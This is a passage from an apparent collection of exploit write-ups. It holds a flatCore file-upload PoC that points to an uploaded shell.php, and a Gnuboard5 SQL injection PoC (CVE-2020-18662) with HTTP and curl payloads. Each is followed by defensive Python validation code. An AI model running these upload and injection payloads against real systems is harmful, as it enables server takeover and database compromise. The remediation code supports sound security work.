# Step 3: Access the uploaded malicious PHP file
echo "Visit the following URL to execute the uploaded PHP file:"
echo "http://flatcore/content/files/shell.php"
This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
[Replace Your Domain Name]
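The two PoCs above combine a client-controlled `upload_destination` (`../content/files`) with an unrestricted filename (`exploit.php`, `shell.php`). The handler below is an added example, not flatCore code, of the checks that close both: the destination is resolved and confined to the upload root, the extension is allowlisted across every suffix, and the leading bytes must match the claimed type. The upload root path is an assumption.

```python
from pathlib import Path, PurePosixPath

UPLOAD_ROOT = Path("/var/www/flatcore/content/files")  # assumed install path
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}
SERVER_SIDE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "htaccess"}
MAGIC = {  # leading bytes the content must carry for each accepted extension
    "png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8", "pdf": b"%PDF-",
}

def safe_destination(requested, root=UPLOAD_ROOT):
    """Resolve the client's upload_destination and keep it inside root; the
    PoC's "../content/files" escapes the upload directory and is refused."""
    root = root.resolve()
    dest = (root / requested.replace("\\", "/").lstrip("/")).resolve()
    if dest != root and root not in dest.parents:
        raise ValueError("upload_destination leaves the upload root")
    return dest

def safe_filename(name):
    """Drop any directory part, then allowlist the extension. Every suffix is
    checked, so shell.php.png and exploit.php are both refused."""
    base = PurePosixPath(name.replace("\\", "/")).name
    if not base or base.startswith("."):
        raise ValueError("bad filename")
    parts = base.lower().split(".")
    if len(parts) < 2 or parts[-1] not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    if any(p in SERVER_SIDE_EXTENSIONS for p in parts[1:]):
        raise ValueError("server-side extension in filename")
    return base

def validate_upload(requested_dir, filename, data, root=UPLOAD_ROOT):
    """Return the path the file may be written to, or raise ValueError."""
    dest = safe_destination(requested_dir, root)
    name = safe_filename(filename)
    ext = name.rsplit(".", 1)[1].lower()
    if not data.startswith(MAGIC[ext]):
        raise ValueError("content does not match extension")
    return dest / name

def upload_rejected(requested_dir, filename, data):
    """True when validate_upload refuses the request."""
    try:
        validate_upload(requested_dir, filename, data)
    except ValueError:
        return True
    return False
```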
# Exploit Title: Gnuboard5 5.3.2.8 - SQL Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/gnuboard/gnuboard5
# Software Link: https://github.com/gnuboard/gnuboard5
# Version: 5.3.2.8
# Tested on: Ubuntu Windows
# CVE : CVE-2020-18662
PoC:
1)
POST /install/install_db.php HTTP/1.1
Host: gnuboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)#
Result: the response is delayed by 5 seconds.
2)
curl -X POST http://gnuboard/install/install_db.php \
-d "mysql_user=root" \
-d "mysql_pass=password" \
-d "mysql_db=gnuboard_db" \
-d "table_prefix=' OR 1=1--"
Result: the application stops working.
[Replace Your Domain Name and Replace Database Information]
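The `table_prefix` value is concatenated into DDL, and the page's first payload uses a backtick to close the quoted identifier and append a second statement. The code below is an added example, not Gnuboard's code: `vulnerable_create_sql` is an assumed shape of the unvalidated concatenation, shown only so the breakout is visible, and `hardened_create_sql` is the fix, an identifier allowlist plus MySQL backtick escaping.

```python
import re

# Allowlist for a MySQL table prefix: word characters only, at most 32. When
# the value can only be [A-Za-z0-9_], no quoting trick can turn it into SQL.
PREFIX_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def vulnerable_create_sql(prefix):
    """Assumed shape of the installer's statement: the prefix goes between
    backticks with neither validation nor escaping (illustration only)."""
    return f"CREATE TABLE `{prefix}config` (cf_title varchar(255))"


def quote_identifier(name):
    """MySQL identifier quoting: a backtick inside the name is doubled."""
    return "`" + name.replace("`", "``") + "`"


def hardened_create_sql(prefix):
    """Reject anything outside the allowlist, then quote the identifier."""
    if not PREFIX_RE.fullmatch(prefix):
        raise ValueError(f"invalid table prefix: {prefix!r}")
    return f"CREATE TABLE {quote_identifier(prefix + 'config')} (cf_title varchar(255))"


def prefix_rejected(prefix):
    """True when the hardened builder refuses the prefix."""
    try:
        hardened_create_sql(prefix)
    except ValueError:
        return True
    return False
```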